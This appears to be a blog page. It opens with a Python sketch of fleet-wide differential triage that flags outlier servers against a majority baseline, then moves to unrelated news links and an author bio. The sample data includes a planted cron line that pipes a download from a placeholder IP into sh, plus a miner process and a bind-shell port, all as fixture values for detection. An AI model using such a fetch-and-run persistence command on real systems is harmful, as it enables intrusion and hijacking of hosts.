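The idea behind that kind of triage is simple enough to sketch in a few dozen lines. What follows is an added illustration in the spirit of the announcement, not Diffy's own code or its data formats: per-host snapshots (listening sockets, process names, cron entries) are constructed sample data, the fleet is assumed to be one autoscaling group of interchangeable web servers, and the baseline is derived by majority vote across the fleet rather than from Netflix's tooling.

```python
"""Fleet-wide differential triage: build a baseline from what most hosts in a
group look like, then rank each host by how far it deviates from that baseline.
Added example modelled on the idea of diffing instances; not Diffy's code."""
from collections import Counter

# Constructed sample snapshots, as an agent (osquery, ss, ps, crontab -l)
# might report them for four hosts in one autoscaling group.
FLEET = {
    "web-1": {
        "listening": {"0.0.0.0:443", "127.0.0.1:9090"},
        "processes": {"nginx", "app-server", "node_exporter", "sshd"},
        "cron": {"0 3 * * * /opt/app/rotate-logs"},
    },
    "web-2": {  # monitoring agent and its port are gone: 'missing' deviations
        "listening": {"0.0.0.0:443"},
        "processes": {"nginx", "app-server", "sshd"},
        "cron": {"0 3 * * * /opt/app/rotate-logs"},
    },
    "web-3": {
        "listening": {"0.0.0.0:443", "127.0.0.1:9090"},
        "processes": {"nginx", "app-server", "node_exporter", "sshd"},
        "cron": {"0 3 * * * /opt/app/rotate-logs"},
    },
    "web-4": {  # constructed outlier: miner, bind shell port, persistence cron
        "listening": {"0.0.0.0:443", "127.0.0.1:9090", "0.0.0.0:4444"},
        "processes": {"nginx", "app-server", "node_exporter", "sshd", "xmrig"},
        "cron": {
            "0 3 * * * /opt/app/rotate-logs",
            "* * * * * curl -s http://198.51.100.7/x | sh",  # TEST-NET-2 address
        },
    },
}


def build_baseline(fleet, quorum=0.5):
    """An item joins the baseline when it is present on more than `quorum` of
    the hosts. With a majority quorum an attacker has to compromise most of
    the group before their artifacts blend into 'normal'. For very small
    groups, substitute a snapshot of a freshly built, known-good instance."""
    hosts = len(fleet)
    categories = set().union(*(snap.keys() for snap in fleet.values()))
    baseline = {}
    for cat in categories:
        counts = Counter(item for snap in fleet.values() for item in snap.get(cat, ()))
        baseline[cat] = {item for item, c in counts.items() if c / hosts > quorum}
    return baseline


def diff_host(snapshot, baseline):
    """Per category: what this host has that the baseline lacks ('extra', e.g.
    a miner) and what the baseline has that this host lacks ('missing', e.g.
    a killed security agent). Categories with no difference are omitted."""
    report = {}
    for cat, expected in baseline.items():
        observed = snapshot.get(cat, set())
        extra, missing = observed - expected, expected - observed
        if extra or missing:
            report[cat] = {"extra": sorted(extra), "missing": sorted(missing)}
    return report


def triage(fleet, quorum=0.5):
    """Return (score, host, report) rows, most deviant host first, so an
    investigator knows which instances to pull evidence from first."""
    baseline = build_baseline(fleet, quorum)
    rows = []
    for host, snap in fleet.items():
        report = diff_host(snap, baseline)
        score = sum(len(v["extra"]) + len(v["missing"]) for v in report.values())
        rows.append((score, host, report))
    rows.sort(key=lambda row: (-row[0], row[1]))
    return rows


if __name__ == "__main__":
    for score, host, report in triage(FLEET):
        print(f"{host}: {score} deviation(s)")
        for cat, delta in report.items():
            print(f"  {cat}: +{delta['extra']} -{delta['missing']}")
```

Two things worth noting in practice: treat "missing" items as seriously as "extra" ones, since a disabled agent or a deleted log rotation job is often the first sign of tampering, and remember that the baseline is only as trustworthy as the fleet it came from, so compare against a known-good image when you suspect a wide compromise.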

Why I had my Software Architecture students design
a mobile banking app.

U.S.
Bancorp this week was the latest to say it will build a
nationally available checking-account product as lenders introduce
mobile offerings that let consumers do their full banking without a
branch. The move follows similar announcements by some of the
country’s largest banks including JPMorgan
Chase & Co., Citigroup Inc. and PNC Financial Services Group
Inc.

The “fake news” concept seems to be catching
on. Definitions seem to vary a bit.

Egypt’s parliament has passed a law giving the
state powers to block social media accounts and penalize journalists
held to be publishing fake news.

Under the law passed on Monday social media
accounts and blogs with more than 5,000 followers on sites such as
Twitter and Facebook will
be treated as media outlets, which makes them subject to
prosecution for publishing false news or incitement to break the law.

Perspective. Holy Mackerel! It’s not an error,
it’s a message from God?

Type the word “dog” into Google Translate 19
times, request that the nonsensical message be flipped from Maori
into English, and out pops what appears to be a garbled religious
prophecy.

“Doomsday Clock is three minutes at twelve,”
it reads. “We are experiencing characters and a dramatic
developments in the world, which indicate that we are increasingly
approaching the end times and Jesus' return.”

About Me

I live in Centennial, Colorado. (I'm not actually 100 years old, but I hope to be some day.) I'm an independent computer consultant, specializing in solving problems that traditional IT personnel tend to have difficulty with... That includes everything from inventorying hardware & software, to converting systems & data, to training end-users. I particularly enjoy taking on projects that IT has attempted several times before with no success. I also teach at two local universities: everything from Introduction to Microcomputers through Business Continuity and Security Management. My background includes IT Audit, Computer Security, and a variety of unique IT projects.